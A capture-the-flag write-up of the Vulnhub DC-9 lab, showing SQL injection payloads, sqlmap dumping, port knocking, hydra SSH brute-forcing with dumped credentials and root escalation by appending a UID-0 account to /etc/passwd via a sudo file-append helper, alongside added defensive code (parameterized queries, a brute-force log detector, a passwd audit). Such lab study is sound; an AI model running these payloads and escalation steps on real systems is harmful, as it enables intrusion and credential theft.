Vulnhub DC-9 Lab WriteUP

优雅殿下 2023-03-05 21:26:43


Recon

First, locate the target with netdiscover; its IP address is 192.168.244.135.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

Next, scan the target with Nmap: port 22 is filtered and port 80 is open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

SQL Injection

Try to access the web service.

Test the Search function for SQL injection.

Use ORDER BY to guess the number of columns; the query returns 6 columns.

Confirm the column count with UNION SELECT.

Get the database name and the current database version.

Get the names of the tables in the current database.

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

Look up the table's column names and dump them:

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#

After obtaining the usernames and password hashes, crack the hashes and log in to the web interface.
Username and password: admin:transorbital1
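The UNION payloads above work because the search term is pasted straight into the SQL text. The following is an added example (not code from the lab or from this writeup) that rebuilds that flaw against a constructed in-memory SQLite database and puts the parameterized version beside it. Table and column names are assumptions modelled on the writeup, the hash is a placeholder, and SQLite's `--` comment stands in for MySQL's `#`.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's database (table and column names are
# assumptions modelled on the writeup; the hash value is a placeholder).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE StaffDetails(id INTEGER, firstname TEXT, lastname TEXT,
                                  position TEXT, phone TEXT, email TEXT);
        INSERT INTO StaffDetails VALUES
            (1, 'Fred', 'Flintstone', 'Quarry worker', '555-0001', 'fred@example.test');
        CREATE TABLE Users(UserID INTEGER, Username TEXT, Password TEXT);
        INSERT INTO Users VALUES (1, 'admin', 'PLACEHOLDER_HASH');
    """)
    return conn

def search_vulnerable(conn, term):
    # The search term is spliced into the SQL text, so a quote ends the string literal
    # and the rest of the input is parsed as SQL: this is the flaw behind the payloads.
    sql = f"SELECT * FROM StaffDetails WHERE firstname = '{term}'"
    return conn.execute(sql).fetchall()

def search_safe(conn, term):
    # Parameter binding keeps the whole input inside one string value; the database
    # never parses it as SQL, so the same payload simply matches no staff member.
    return conn.execute(
        "SELECT * FROM StaffDetails WHERE firstname = ?", (term,)).fetchall()

# Same shape as the writeup's payload against Staff.Users; SQLite uses -- for comments
# where MySQL accepts #, and group_concat exists in both.
PAYLOAD = ("Fred' UNION SELECT 1,2,3,4,5,group_concat(Username || ':' || Password) "
           "FROM Users--")

def leaked_credentials(rows):
    """Return whatever the injected SELECT smuggled into the sixth column.

    The marker values 1..5 in the first five columns identify rows that came from
    the UNION branch rather than from StaffDetails."""
    return [r[5] for r in rows if tuple(r[:5]) == (1, 2, 3, 4, 5)]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_credentials(search_vulnerable(db, PAYLOAD)))
    print("parameterized:", search_safe(db, PAYLOAD))
```

Run it and the vulnerable query hands back `admin:PLACEHOLDER_HASH` while the parameterized query returns nothing; the point for the application owner is that the fix is binding, not filtering quotes.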

The "File does not exist" message on the Manage page suggests a file inclusion vulnerability, so we brute-force the parameter with BurpSuite.

Note that the payload must not be URL-encoded when the request is sent.

We now have usernames, but the SSH port is not open. Under /etc we find /etc/knockd.conf: knockd controls the opening and closing of the SSH port, and according to its configuration the port opens only after the specified ports are contacted in order.

The configuration shows that contacting ports 7469, 8475 and 9842 in that order opens SSH. We can knock with nc or nmap.

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Brute Force

The SSH port is now open, but we have no SSH username or password. We use sqlmap to dump the database and then brute-force SSH with the result. First, save the HTTP request for the injection point to a file.

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

Then dump the table contents with the following command.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

Next, process the dump into word lists and run the brute-force.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

With the passwords in hand we log in and try to escalate. None of the three accounts has sudo rights, but janitor's home directory contains a hidden file.

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

We brute-force SSH again with these passwords.

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27
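Both hydra runs above leave a very recognisable trace on the target: hundreds of failed passwords per minute from one source, many distinct usernames, then an accepted login from that same source. The following is an added example (not part of the original writeup) that scores sshd auth-log lines with a sliding window and raises an alert for the burst and for a success that follows it. The log excerpt is constructed for the example; the hostname, PIDs, ports and the 192.168.244.128 source address are assumptions, not values taken from the lab.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt modelled on the hydra runs in this writeup: one source
# sprays many usernames within seconds, then one login succeeds. Hostname, PIDs,
# ports and the 192.168.244.128 source address are assumptions.
SAMPLE_AUTH_LOG = """\
Mar  5 06:57:02 dc-9 sshd[1101]: Failed password for invalid user test01 from 192.168.244.128 port 40010 ssh2
Mar  5 06:57:02 dc-9 sshd[1102]: Failed password for invalid user test02 from 192.168.244.128 port 40011 ssh2
Mar  5 06:57:03 dc-9 sshd[1103]: Failed password for fredf from 192.168.244.128 port 40012 ssh2
Mar  5 06:57:03 dc-9 sshd[1104]: Failed password for invalid user test03 from 192.168.244.128 port 40013 ssh2
Mar  5 06:57:04 dc-9 sshd[1105]: Failed password for invalid user test04 from 192.168.244.128 port 40014 ssh2
Mar  5 06:57:04 dc-9 sshd[1106]: Failed password for joeyt from 192.168.244.128 port 40015 ssh2
Mar  5 06:57:05 dc-9 sshd[1107]: Failed password for invalid user test05 from 192.168.244.128 port 40016 ssh2
Mar  5 06:57:05 dc-9 sshd[1108]: Failed password for invalid user test06 from 192.168.244.128 port 40017 ssh2
Mar  5 06:57:06 dc-9 sshd[1109]: Failed password for janitor from 192.168.244.128 port 40018 ssh2
Mar  5 06:57:06 dc-9 sshd[1110]: Failed password for janitor from 192.168.244.1 port 50001 ssh2
Mar  5 06:57:07 dc-9 sshd[1111]: Failed password for invalid user test07 from 192.168.244.128 port 40019 ssh2
Mar  5 06:57:08 dc-9 sshd[1112]: Accepted password for chandlerb from 192.168.244.128 port 40020 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

def parse_event(line, year=2023):
    """Turn one sshd auth line into a dict, or None if it is not a password event."""
    m = LOG_RE.match(line)
    if not m:
        return None
    stamp = re.sub(r"\s+", " ", m["ts"])  # syslog pads single-digit days with spaces
    return {
        "ts": datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"),
        "result": m["result"],
        "user": m["user"],
        "ip": m["ip"],
    }

def detect_bruteforce(lines, window_s=60, threshold=10):
    """Sliding-window count of failed passwords per source IP.

    Emits one 'bruteforce' alert when a source reaches `threshold` failures inside
    `window_s` seconds, and a 'success-after-burst' alert for any later accepted
    login from a source that was already flagged.
    """
    recent = defaultdict(deque)     # ip -> failure timestamps still inside the window
    users_tried = defaultdict(set)  # ip -> distinct usernames attempted
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ip, q = ev["ip"], recent[ev["ip"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            users_tried[ip].add(ev["user"])
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip,
                               "failures": len(q),
                               "distinct_users": len(users_tried[ip])})
        elif ip in flagged:
            alerts.append({"type": "success-after-burst", "ip": ip, "user": ev["user"]})
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

On the sample the detector fires once for 192.168.244.128 after its tenth failure (ten distinct usernames, a spray rather than one user mistyping) and again when chandlerb's login is accepted from that source; the single failure from 192.168.244.1 stays below the threshold. The threshold is deliberately low because the writeup's run reached 341 tries per minute; tune it to the real baseline, and treat the success-after-burst alert as the one that needs immediate action.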

Check the sudo privileges with sudo -l.

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Move up to the parent directory of that executable and read the source of test.py.

#!/usr/bin/python
# test.py as found on the target: appends the contents of one file to another.
# Neither path is validated, so when a sudo rule runs this as root the caller
# can read and append to any file on the system.

import sys

if len(sys.argv) != 3:
    print("Usage: python test.py read append")
    sys.exit(1)

else:
    # Read the whole of the first file...
    f = open(sys.argv[1], "r")
    output = f.read()

    # ...and append it to the second one.
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

From the source we see that the program expects three argv entries (the script name plus two arguments): it reads the file named by the first argument and appends its content to the file named by the second. So we can write a user with root privileges into /etc/passwd and escalate. First we use the program to read the shadow file and pick a user whose password we already know.

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

We change this entry to the following and save it as /tmp/test.
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

Then write it with the test program (use single quotes so the shell does not expand the $ characters in the hash) and escalate with su (enter janitor's password here, since the entry reuses janitor's hash).

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

After escalating we obtain the FLAG.
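Two things make the last step work: the sudo-enabled helper accepts any path, and nothing on the box notices a second UID-0 entry with its hash stored inline in /etc/passwd. The following is an added example (not the lab's code and not part of the writeup) that shows the helper rewritten to stay inside an allowed directory, plus a small /etc/passwd audit that flags exactly the entry the writeup appends. The allowed-root rule and the sample passwd text are assumptions; the hash in the sample is a placeholder.

```python
from pathlib import Path
import tempfile

def safe_append(src, dst, allowed_root):
    """Hardened counterpart of the lab's test.py (added here, not the lab's code).

    Appends src to dst like the original, but refuses symlinks and any path whose
    resolved location is not strictly inside allowed_root, so a sudo rule that runs
    it as root can no longer be pointed at /etc/shadow or /etc/passwd.
    """
    root = Path(allowed_root).resolve()
    src, dst = Path(src), Path(dst)
    for p in (src, dst):
        if p.is_symlink():
            raise PermissionError(f"refusing symlink {p}")
        if root not in p.resolve().parents:   # resolve() folds away any ../ tricks
            raise PermissionError(f"{p} resolves outside {root}")
    data = src.read_bytes()
    with open(dst, "ab") as f:
        f.write(data)
    return len(data)

def audit_passwd(passwd_text):
    """Flag what the writeup's 'hacker' entry leaves behind in passwd(5) text:
    a UID-0 account other than root, and a hash stored inline instead of 'x'."""
    findings = {"extra_uid0": [], "inline_hash": [], "malformed": []}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings["malformed"].append(line)
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings["extra_uid0"].append(name)
        if pw not in ("x", "*", "!", ""):
            findings["inline_hash"].append(name)
    return findings

# Constructed passwd excerpt: three normal entries plus an appended UID-0 account
# whose hash is a placeholder, the shape the writeup produces.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred:/home/fredf:/bin/bash
hacker:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

def demo_safe_append():
    """Exercise safe_append on constructed files inside a temporary directory.

    Returns (bytes appended, number of rejected out-of-root targets, out.txt content)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "in.txt").write_text("hello\n")
        n = safe_append(root / "in.txt", root / "out.txt", root)
        rejected = 0
        for bad in (root / ".." / "escape.txt", Path("/etc/passwd")):
            try:
                safe_append(root / "in.txt", bad, root)
            except PermissionError:
                rejected += 1
        return n, rejected, (root / "out.txt").read_text()

if __name__ == "__main__":
    print(demo_safe_append())
    print(audit_passwd(SAMPLE_PASSWD))
```

The audit reports `hacker` under both `extra_uid0` and `inline_hash`; on a real host, run it from a file-integrity or configuration check so an appended entry is caught the next time the file changes, and pair it with the sudoers review that would have shown the NOPASSWD rule on an arbitrary file copier in the first place.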

posted @ 2023-03-05 20:51  ZywOo